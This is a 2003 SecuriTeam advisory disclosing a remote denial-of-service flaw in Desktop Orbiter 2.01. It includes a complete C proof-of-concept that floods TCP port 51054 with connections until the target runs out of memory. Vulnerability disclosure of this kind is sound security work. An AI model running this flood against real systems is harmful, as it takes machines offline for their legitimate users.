[NT] Remote DoS in Desktop Orbiter

• Previous message: SecuriTeam: "[NT] Personal FTP Server Saves Passwords in the Clear"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 31 May 2003 11:18:01 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Remote DoS in Desktop Orbiter
------------------------------------------------------------------------

SUMMARY

 <http://www.anfibia.net/products/orbiter/> Desktop Orbiter is a
"all-in-one remote security solution for Windows NT/2000/XP networks". A
vulnerability in the product allows remote attackers to cause a denial of
service attack against the product. This in turn causes the product to no
longer respond to legitimate requests, while rendering the computer
unusable.

DETAILS

Vulnerable systems:
 * Desktop Orbiter version 2.01

On every connection to TCP port 51054, a snapshot preview of the desktop
is loaded into the memory. By initiating a large amount of connections to
this port a remote attacker can completely fill the virtual memory and
flood the user with a mass of errors messages (like: virtual memory
insufficient, exception error, out of memory and Desktop Orbiter's
errors). In order for a user to remove all these messages, and regain
control of the server, a server restart would be necessary.

Exploit:
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define PORT 51054

int main(int argc, char *argv[]){

int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;

int c;
int n;
char *host = NULL;
int cnt=1;
        
if(argc < 2 ) {
printf("Usage:%s -h <host>\n",argv[0]);
exit(0);
}

while((n = getopt(argc, argv, "h")) != -1) {
                switch(n) {
                        case 'h':
                        host = optarg;
                        break;
                                        
                        default:
                        printf("Bad Input\n");
                        exit(0);
                }
        }

if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }

        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(PORT);
        their_addr.sin_addr = *((struct in_addr *) he->h_addr);
        bzero(&(their_addr.sin_zero), 8);

printf("\n\n\t\t#########################################################\n");
printf("\t\t# Proof of Concept by Luca Ercoli luca.ercoli@inwind.it #\n");
printf("\t\t# Desktop Orbiter 2.01 Denial of Service #\n");
printf("\t\t#########################################################\n\n");
printf("\nAttacking....\n\a");

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }

       if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct
sockaddr)) == -1)
          {
                 perror("connect");
exit(0);
}

for (c=0;c<99500;c++){

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }

        if (connect (sockfd, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) == -1)
          {
                 
printf("\n[Attack status] Step %d/25 : Complete!",cnt);

if (cnt == 25) {
printf("\nAttack Complete!\n\n\a");
exit(0);
}

cnt++;
  
sleep(1);
                  
          }

close(sockfd);

}

printf("\n");
return 1;

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:luca.ercoli@inwind.it> Luca
Ercoli.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] Personal FTP Server Saves Passwords in the Clear"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]